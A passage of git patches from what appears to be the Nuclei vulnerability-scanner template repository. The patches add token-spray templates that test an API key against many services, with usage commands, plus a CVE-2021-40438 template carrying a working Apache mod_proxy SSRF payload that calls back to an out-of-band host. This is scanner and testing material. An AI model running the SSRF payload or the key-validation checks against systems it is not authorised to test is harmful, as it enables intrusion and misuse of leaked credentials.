b/token-spray/jumpcloud.yaml index a885c5c780..cdfbdba931 100644 --- a/token-spray/jumpcloud.yaml +++ b/token-spray/jumpcloud.yaml @@ -14,6 +14,7 @@ requests: headers: X-Api-Key: "{{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/lokalise.yaml b/token-spray/lokalise.yaml index 0c937b51fa..5ca1351c6d 100644 --- a/token-spray/lokalise.yaml +++ b/token-spray/lokalise.yaml @@ -14,6 +14,7 @@ requests: headers: X-Api-Token: "{{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/loqate.yaml b/token-spray/loqate.yaml index d0ed434602..2cbb1f4e69 100644 --- a/token-spray/loqate.yaml +++ b/token-spray/loqate.yaml @@ -12,6 +12,7 @@ requests: path: - "api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}&Countries=US,CA&Language=en&Limit=5&Text=BHAR" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/mailchimp.yaml b/token-spray/mailchimp.yaml index 9d7073e46c..840ab656f4 100644 --- a/token-spray/mailchimp.yaml +++ b/token-spray/mailchimp.yaml @@ -14,6 +14,7 @@ network: host: - "tls://smtp.mandrillapp.com:465" + self-contained: true matchers: - type: word words: diff --git a/token-spray/mailgun.yaml b/token-spray/mailgun.yaml index 3667ba1c69..67d7c356bd 100644 --- a/token-spray/mailgun.yaml +++ b/token-spray/mailgun.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Basic {{base64('api:' + token)}} + self-contained: true matchers: - type: status status: diff --git a/token-spray/mapbox.yaml b/token-spray/mapbox.yaml index c4640d9695..5e68a1ec4b 100644 --- a/token-spray/mapbox.yaml +++ b/token-spray/mapbox.yaml @@ -12,6 +12,7 @@ requests: path: - "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/nerdgraph.yaml b/token-spray/nerdgraph.yaml index d67d458faa..a0b6cddb77 100644 --- a/token-spray/nerdgraph.yaml +++ b/token-spray/nerdgraph.yaml @@ -16,6 +16,7 @@ requests: API-Key: "{{token}}" body: "{ \"query\": \"{ requestContext { userId apiKey }}\" }" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/npm.yaml b/token-spray/npm.yaml index cfe2c86746..6105c678db 100644 --- a/token-spray/npm.yaml +++ b/token-spray/npm.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Bearer {{token}} + self-contained: true matchers: - type: status status: diff --git a/token-spray/openweather.yaml b/token-spray/openweather.yaml index 1a9a5058e3..4c32828a44 100644 --- a/token-spray/openweather.yaml +++ b/token-spray/openweather.yaml @@ -12,6 +12,7 @@ requests: path: - "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/pagerduty.yaml b/token-spray/pagerduty.yaml index fcc00d7e88..48756e267e 100644 --- a/token-spray/pagerduty.yaml +++ b/token-spray/pagerduty.yaml @@ -15,6 +15,7 @@ requests: Accept: application/vnd.pagerduty+json;version=2 Authorization: Token token={{token}} + self-contained: true matchers: - type: status status: diff --git a/token-spray/pendo.yaml b/token-spray/pendo.yaml index 8ea141bcc0..5a46a542a8 100644 --- a/token-spray/pendo.yaml +++ b/token-spray/pendo.yaml @@ -16,6 +16,7 @@ requests: Content-Type: application/json X-Pendo-Integration-Key: "{{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/pivotaltracker.yaml b/token-spray/pivotaltracker.yaml index c52e04af9a..29e6e32c56 100644 --- a/token-spray/pivotaltracker.yaml +++ b/token-spray/pivotaltracker.yaml @@ -14,6 +14,7 @@ requests: headers: X-TrackerToken: "{{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/postmark.yaml b/token-spray/postmark.yaml index 5b5aead0dc..72480a7efc 100644 --- a/token-spray/postmark.yaml +++ b/token-spray/postmark.yaml @@ -15,6 +15,7 @@ requests: Accept: application/json X-Postmark-Server-Token: "{{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/sendgrid.yaml b/token-spray/sendgrid.yaml index b887b0b7d1..b84a41a488 100644 --- a/token-spray/sendgrid.yaml +++ b/token-spray/sendgrid.yaml @@ -16,6 +16,7 @@ network: host: - "tls://smtp.sendgrid.net:465" + self-contained: true matchers: - type: word words: diff --git a/token-spray/slack.yaml b/token-spray/slack.yaml index 2703830f3a..e9e2a0af1e 100644 --- a/token-spray/slack.yaml +++ b/token-spray/slack.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Bearer {{token}} + self-contained: true matchers: - type: word part: body diff --git a/token-spray/sonarcloud.yaml b/token-spray/sonarcloud.yaml index fdf0dc6724..9ca1db987c 100644 --- a/token-spray/sonarcloud.yaml +++ b/token-spray/sonarcloud.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Basic {{base64(token + ':')}} + self-contained: true matchers: - type: word part: body diff --git a/token-spray/spotify.yaml b/token-spray/spotify.yaml index 2ccc098209..7cb306b924 100644 --- a/token-spray/spotify.yaml +++ b/token-spray/spotify.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Bearer {{token}} + self-contained: true matchers: - type: status status: diff --git a/token-spray/square.yaml b/token-spray/square.yaml index 383e3ddc8a..2a5f7210fb 100644 --- a/token-spray/square.yaml +++ b/token-spray/square.yaml @@ -16,6 +16,7 @@ requests: Content-Type: application/json Authorization: Bearer {{token}} + self-contained: true matchers: - type: word part: body diff --git a/token-spray/stripe.yaml b/token-spray/stripe.yaml index 16e358e75a..15dd931744 100644 --- a/token-spray/stripe.yaml +++ b/token-spray/stripe.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Basic {{base64(token + ':')}} + self-contained: true matchers: - type: status status: diff --git a/token-spray/tinypng.yaml b/token-spray/tinypng.yaml index 922e62848b..44598c428a 100644 --- a/token-spray/tinypng.yaml +++ b/token-spray/tinypng.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Basic {{base64('api:' + token)}} + self-contained: true matchers: - type: word part: header diff --git a/token-spray/travisci.yaml b/token-spray/travisci.yaml index 5212516fc1..c17c49290f 100644 --- a/token-spray/travisci.yaml +++ b/token-spray/travisci.yaml @@ -15,6 +15,7 @@ requests: Travis-API-Version: 3 Authorization: token {{token}} + self-contained: true matchers: - type: status status: diff --git a/token-spray/twitter.yaml b/token-spray/twitter.yaml index d648daa0d1..9657045185 100644 --- a/token-spray/twitter.yaml +++ b/token-spray/twitter.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Bearer {{token}} + self-contained: true matchers: - type: word part: body diff --git a/token-spray/visualstudio.yaml b/token-spray/visualstudio.yaml index a05d17e57a..d7d6c6b836 100644 --- a/token-spray/visualstudio.yaml +++ b/token-spray/visualstudio.yaml @@ -15,6 +15,7 @@ requests: Content-Type: application/json X-Api-Token: "{{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/wakatime.yaml b/token-spray/wakatime.yaml index b48ed5e79f..c54d184fc1 100644 --- a/token-spray/wakatime.yaml +++ b/token-spray/wakatime.yaml @@ -12,6 +12,7 @@ requests: path: - "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/weglot.yaml b/token-spray/weglot.yaml index 9c1a8e2874..79ddab793f 100644 --- a/token-spray/weglot.yaml +++ b/token-spray/weglot.yaml @@ -15,6 +15,7 @@ requests: Content-Type: application/json body: "{\"l_from\":\"en\",\"l_to\":\"fr\",\"request_url\":\"https://www.website.com/\",\"words\":[{\"w\":\"This is a blue car\",\"t\":1},{\"w\":\"This is a black car\",\"t\":1}]}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/youtube.yaml b/token-spray/youtube.yaml index 3ab7726092..1546808ea7 100644 --- a/token-spray/youtube.yaml +++ b/token-spray/youtube.yaml @@ -13,6 +13,7 @@ requests: - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}" matchers-condition: or + self-contained: true matchers: - type: word part: body From 68b63a9ca5e9e08532a27a16e26410ab6d752339 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 15 Oct 2021 00:18:16 +0530 Subject: [PATCH 2940/4083] misc readme update --- token-spray/README.md | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/token-spray/README.md b/token-spray/README.md index 24081b4662..e49667d4b7 100644 --- a/token-spray/README.md +++ b/token-spray/README.md @@ -1,15 +1,19 @@ ## About + This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant). ## Usage -You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `token-spray` directory assumes the input API token will be provided using CLI `var` flag. -```bash -# Run Nuclei specifying all the api templates: +**token-spray** are self-contained template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag. -nuclei -u null -t token-spray/ -var token=thisIsMySecretTokenThatIWantToTest +```console +# Running token-spray templates against a single token to test +nuclei -t token-spray/ -var token=random-token-to-test + +# Running token-spray templates against a file containing multiple new line delimited tokens +nuclei -t token-spray/ -var token=file_with_tokens.txt ``` ## Credits -These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs. +These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs. \ No newline at end of file From 8bf46d9b5b501dbd3f5670d7f3cad2541fab8145 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Fri, 15 Oct 2021 00:55:50 +0530 Subject: [PATCH 2941/4083] Update aviatrix-detect.yaml --- technologies/aviatrix-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/aviatrix-detect.yaml b/technologies/aviatrix-detect.yaml index dde084ebea..343b261d8b 100644 --- a/technologies/aviatrix-detect.yaml +++ b/technologies/aviatrix-detect.yaml @@ -2,7 +2,7 @@ id: aviatrix-detect info: name: Aviatrix Detect - author: pikpikcu, philippedelteil + author: pikpikcu,philippedelteil severity: info tags: tech,aviatrix @@ -17,11 +17,11 @@ requests: matchers: - type: dsl name: "title" + condition: and dsl: - 'contains(body, "Aviatrix")' - 'contains(body, "Controller")' - 'status_code == 200' - condition: and - type: dsl name: "favicon" From 1ef07b6ad974a8da85eae0705de11248c228861d Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 15 Oct 2021 01:29:52 +0530 Subject: [PATCH 2942/4083] Added CVE-2021-40438 --- cves/2021/CVE-2021-40438.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2021/CVE-2021-40438.yaml diff --git a/cves/2021/CVE-2021-40438.yaml b/cves/2021/CVE-2021-40438.yaml new file mode 100644 index 0000000000..9ee619b741 --- /dev/null +++ b/cves/2021/CVE-2021-40438.yaml @@ -0,0 +1,25 @@ +id: CVE-2021-40438 + +info: + name: Apache <= 2.4.48 - Mod_Proxy SSRF + author: pdteam + severity: critical + description: A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. + reference: + - https://firzen.de/building-a-poc-for-cve-2021-40438 + - https://httpd.apache.org/security/vulnerabilities_24.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-40438 + tags: cve,cve2021,ssrf,apache,mod-proxy,oob + +requests: + - method: GET + path: + - '{{BaseURL}}/?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://{{interactsh-url}}/' + + redirects: true + max-redirects: 2 + matchers: + - type: word + part: interactsh_protocol + words: + - "http" # Confirms HTTP Interaction \ No newline at end of file From 1833c3de19ae14f7931ea1c5d112cdadba28b6f7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 14 Oct 2021 20:34:25 +0000 Subject: [PATCH 2943/4083] Auto Generated CVE annotations [Thu Oct 14 20:34:25 UTC 2021] :robot: --- cves/2021/CVE-2021-40438.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-40438.yaml b/cves/2021/CVE-2021-40438.yaml index 9ee619b741..8c7d545c22 100644 --- a/cves/2021/CVE-2021-40438.yaml +++ b/cves/2021/CVE-2021-40438.yaml @@ -10,6 +10,11 @@ info: - https://httpd.apache.org/security/vulnerabilities_24.html - https://nvd.nist.gov/vuln/detail/CVE-2021-40438 tags: cve,cve2021,ssrf,apache,mod-proxy,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.00 + cve-id: CVE-2021-40438 + cwe-id: CWE-918 requests: - method: GET From 69502eaab19316b7967de6f823934fd3d70a9879 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 15 Oct 2021 07:01:39 +0000 Subject: [PATCH 2944/4083] Auto Generated Templates Stats [Fri Oct 15 07:01:39 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1800 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 915 insertions(+), 907 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 46b5586d34..4bed7d43d2 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ 